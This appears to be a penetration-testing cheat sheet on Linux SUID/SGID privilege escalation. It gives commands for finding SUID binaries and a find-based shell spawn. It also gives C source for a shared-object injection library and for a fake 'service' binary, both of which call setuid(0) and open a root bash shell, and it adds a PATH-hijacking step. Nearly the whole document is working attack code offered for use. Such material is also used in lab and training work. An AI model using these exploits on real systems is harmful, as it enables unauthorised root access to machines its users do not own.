Skip to content

SUID / SGID

Find with +s

find /usr/bin -name find -exec /bin/bash -ip \;

SUID Commands

find / -user root -perm /4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -name '*.txt' 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid
getcap -r / 2>/dev/null

SUID / SGID Executables - Known Exploits

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
  • try to find existing exploit for findings (put main focus on items with know version) on https://www.exploit-db.com

SUID / SGID Executables - Shared Object Injection

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace <program-location> 2>&1 | grep -iE "open|access|no such file"
  • Run strace on the file and search the output for open/access calls and for "no such file" errors:
  • If log will show that some external dependency are missing (/home/user/.config/libcalc.so), recreate them with own code
  • Check if you can overwrite something
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c 
libcalc.c
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
        setuid(0);
        system("/bin/bash -p");
}

SUID / SGID Executables - Environment Variables

Run strings on the file to look for strings of printable characters

strings /usr/local/bin/suid-env

One line ("service apache2 start") suggests that the service executable is being called to start the webserver, however the full path of the executable (/usr/sbin/service) is not being used. What give us possibility to overwrite this

gcc -o /tmp/hack-lib/service /home/user/tools/suid/service.c

service.c

int main() {
        setuid(0);
        system("/bin/bash -p");
}

add new lib localization to PATH*

PATH=/tmp/hack-lib:$PATH

run to get root

/usr/local/bin/suid-env